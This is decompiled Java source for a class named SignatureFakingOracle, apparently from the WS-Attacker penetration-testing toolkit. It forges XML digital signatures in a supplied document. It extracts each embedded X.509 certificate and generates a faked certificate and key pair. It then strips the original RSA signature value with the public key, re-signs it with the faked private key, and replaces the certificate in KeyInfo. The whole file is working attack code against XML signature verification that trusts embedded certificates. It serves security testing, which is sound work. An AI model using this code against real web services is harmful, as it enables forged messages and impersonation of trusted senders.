/*
 * Decompiled with CFR 0.152.
 */
package wsattacker.library.signatureFaking;

import java.security.InvalidKeyException;
import java.security.NoSuchAlgorithmException;
import java.security.PrivateKey;
import java.security.Provider;
import java.security.PublicKey;
import java.security.Security;
import java.util.LinkedList;
import java.util.List;
import javax.crypto.BadPaddingException;
import javax.crypto.Cipher;
import javax.crypto.IllegalBlockSizeException;
import javax.crypto.NoSuchPaddingException;
import org.apache.commons.codec.binary.Base64;
import org.apache.log4j.Logger;
import org.bouncycastle.jce.provider.BouncyCastleProvider;
import org.w3c.dom.Document;
import org.w3c.dom.Element;
import org.w3c.dom.NamedNodeMap;
import org.w3c.dom.Node;
import org.w3c.dom.NodeList;
import org.xml.sax.SAXException;
import wsattacker.library.signatureFaking.exceptions.CertificateHandlerException;
import wsattacker.library.signatureFaking.exceptions.SignatureFakingException;
import wsattacker.library.signatureFaking.helper.CertificateHandler;
import wsattacker.library.xmlutilities.dom.DomUtilities;

public class SignatureFakingOracle {
    private Document doc;
    private List<Node> signatureValueElements;
    private List<Node> keyInfoElements;
    private List<String> certificates;
    private List<CertificateHandler> certHandlers;
    private Logger log = Logger.getLogger(SignatureFakingOracle.class);

    public SignatureFakingOracle(String documentString) throws SignatureFakingException {
        Security.addProvider((Provider)new BouncyCastleProvider());
        this.signatureValueElements = new LinkedList<Node>();
        this.keyInfoElements = new LinkedList<Node>();
        this.certificates = new LinkedList<String>();
        this.certHandlers = new LinkedList<CertificateHandler>();
        try {
            this.doc = DomUtilities.stringToDom((String)documentString);
            this.crawlSignatureElements();
            this.log.debug((Object)("found " + this.signatureValueElements.size() + " SignatureValue elements"));
            this.crawlKeyInfoElements();
            this.log.debug((Object)("found " + this.keyInfoElements.size() + " KeyInfo elements containing X509 certificates"));
        }
        catch (SAXException e) {
            throw new SignatureFakingException(e);
        }
    }

    public void fakeSignatures() throws SignatureFakingException {
        try {
            this.createFakedCertificates();
            for (int i = 0; i < this.signatureValueElements.size(); ++i) {
                this.fakeSignature(i);
            }
        }
        catch (CertificateHandlerException e) {
            throw new SignatureFakingException(e);
        }
    }

    public void fakeSignature(int i) throws CertificateHandlerException, SignatureFakingException {
        if (this.signatureValueElements.size() != this.certHandlers.size()) {
            this.createFakedCertificates();
        }
        String signature = this.signatureValueElements.get(i).getTextContent();
        CertificateHandler ch = this.certHandlers.get(i);
        byte[] newSignature = this.resignValue(Base64.decodeBase64((String)signature), ch);
        this.signatureValueElements.get(i).setTextContent(new String(Base64.encodeBase64((byte[])newSignature)));
        this.appendCertificate(this.keyInfoElements.get(i), ch.getFakedCertificateString());
    }

    private void createFakedCertificates() throws CertificateHandlerException {
        for (String cert : this.certificates) {
            CertificateHandler ch = new CertificateHandler(cert);
            ch.createFakedCertificate();
            this.certHandlers.add(ch);
        }
    }

    public boolean certificateProvided() {
        return this.certificates.size() > 0;
    }

    public void setCertificate(String cert) {
        this.certificates.clear();
        for (int i = 0; i < this.signatureValueElements.size(); ++i) {
            this.certificates.add(cert);
        }
    }

    private void crawlKeyInfoElements() {
        for (Node ki : this.keyInfoElements) {
            Node x509cert;
            List l = DomUtilities.findChildren((Node)ki, (String)"X509Certificate", (String)"http://www.w3.org/2000/09/xmldsig#", (boolean)true);
            if (l.size() <= 0 || (x509cert = (Node)l.get(0)) == null || !x509cert.getLocalName().equals("X509Certificate")) continue;
            this.certificates.add(x509cert.getTextContent());
        }
    }

    private void crawlSignatureElements() throws SignatureFakingException {
        NodeList nl = this.getSignatureElements();
        for (int i = 0; i < nl.getLength(); ++i) {
            Node n = nl.item(i);
            NodeList children = n.getChildNodes();
            for (int j = 0; j < children.getLength(); ++j) {
                Node current = children.item(j);
                if (current.getNodeType() != 1) continue;
                if (current.getLocalName().equals("SignedInfo")) {
                    Element signatureMethod = (Element)DomUtilities.findChildren((Node)current, (String)"SignatureMethod", (String)"http://www.w3.org/2000/09/xmldsig#", (boolean)false).get(0);
                    if (signatureMethod == null || this.isSignatureMethodSupported(signatureMethod)) continue;
                    throw new SignatureFakingException("Signature Algorithm not yet supported");
                }
                if (current.getLocalName().equals("SignatureValue")) {
                    this.signatureValueElements.add(current);
                    continue;
                }
                if (!current.getLocalName().equals("KeyInfo")) continue;
                this.keyInfoElements.add(current);
            }
        }
    }

    private boolean isSignatureMethodSupported(Node signatureMethodElement) {
        String algorithm;
        NamedNodeMap nl = signatureMethodElement.getAttributes();
        Node n = nl.getNamedItem("Algorithm");
        return n != null && (algorithm = n.getTextContent()).contains("rsa-sha");
    }

    private void appendCertificate(Node keyInfo, String certificate) {
        keyInfo.setTextContent("");
        String prefix = keyInfo.getPrefix();
        prefix = prefix == null ? "" : prefix + ":";
        Element data = keyInfo.getOwnerDocument().createElementNS("http://www.w3.org/2000/09/xmldsig#", prefix + "X509Data");
        keyInfo.appendChild(data);
        Element cert = keyInfo.getOwnerDocument().createElementNS("http://www.w3.org/2000/09/xmldsig#", prefix + "X509Certificate");
        data.appendChild(cert);
        cert.setTextContent(certificate);
        this.log.debug((Object)("Appending Certificate \r\n" + certificate + "\r\nto the" + prefix + "X509Certificate element"));
    }

    private byte[] resignValue(byte[] signatureValue, CertificateHandler ch) throws SignatureFakingException {
        PrivateKey privKey = ch.getFakedKeyPair().getPrivate();
        PublicKey pubKey = ch.getOriginalPublicKey();
        String alg = ch.getFakedCertificate().getSigAlgName();
        if (alg.contains("RSA")) {
            try {
                Cipher cipher = Cipher.getInstance("RSA/None/NoPadding");
                cipher.init(1, pubKey);
                byte[] unsigend = cipher.doFinal(signatureValue);
                cipher = Cipher.getInstance("RSA/None/NoPadding");
                cipher.init(2, privKey);
                this.log.debug((Object)"New Signature value computed");
                return cipher.doFinal(unsigend);
            }
            catch (BadPaddingException e) {
                throw new SignatureFakingException(e);
            }
            catch (IllegalBlockSizeException e) {
                throw new SignatureFakingException(e);
            }
            catch (InvalidKeyException e) {
                throw new SignatureFakingException(e);
            }
            catch (NoSuchAlgorithmException e) {
                throw new SignatureFakingException(e);
            }
            catch (NoSuchPaddingException e) {
                throw new SignatureFakingException(e);
            }
        }
        return null;
    }

    private NodeList getSignatureElements() {
        return this.doc.getElementsByTagNameNS("http://www.w3.org/2000/09/xmldsig#", "Signature");
    }

    public List<String> getCertificates() {
        return this.certificates;
    }

    public String getDocument() {
        return DomUtilities.domToString((Document)this.doc);
    }
}

